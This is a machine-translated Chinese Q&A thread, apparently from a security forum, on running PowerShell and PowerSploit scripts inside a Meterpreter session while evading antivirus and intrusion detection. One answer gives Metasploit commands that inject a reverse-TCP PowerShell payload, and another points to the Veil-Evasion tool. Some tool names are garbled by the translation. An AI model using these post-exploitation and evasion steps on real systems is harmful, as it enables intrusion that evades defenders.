meterpreter会话中的Powershell脚本

Question

我有一个问题，我试着回答自己，但没有成功。我喜欢为开发后的目的提供的所有powershell脚本，-> Powersploit；我唯一的问题是，我找不到任何简单的方法来使用他们在一个米预会话。

如果我错了，请纠正我，但是没有办法从shell (米表)中得到一个“交互式”的powershell。除了通过cmd命令将脚本转换为Base64编码和调用函数(也是编码的)之外，我找不到任何其他解决方案。

我想要做的(如果有可能的话)是从一个已经建立的计量器会话中获得一个交互式shell (如果考虑到您必须避开IDS、AV、沙箱等，有时得到它是一个真正的挑战)。

有什么解决办法吗？

Answer 1

使用流星PowerShell扩展。在这种情况下，您的PowerShell将在内存中运行，而不会中断。如果您展开，则cmdscan或控制台在波动性或Rekall (或任何类似的技术，每个EDR和DFIR工具使用)将标记进程空间，并提供明显的妥协结果。

Answer 2

如果您已经有一个计量器会话，使用background将其放到后台。

那就做：

use exploit/windows/local/payload_inject
set payload windows/powershell_reverse_tcp
set session <id of session>
set <other options you may need>
run

然后，您将有一个Powershell会话与计量器。它仍然不是完美的(没有选项卡完成)，但它提供了命令的输出。

Answer 3

您可以使用powershell，一旦您得到计量器外壳。只需与meterpreter交互，然后键入shell命令，然后输入powershell >

在这里，您可以使用powershell命令来执行您想做的任何事情。

为了避免AV变得简单，您可以使用Veil工具https://github.com/Veil-Framework/Veil-Evasion。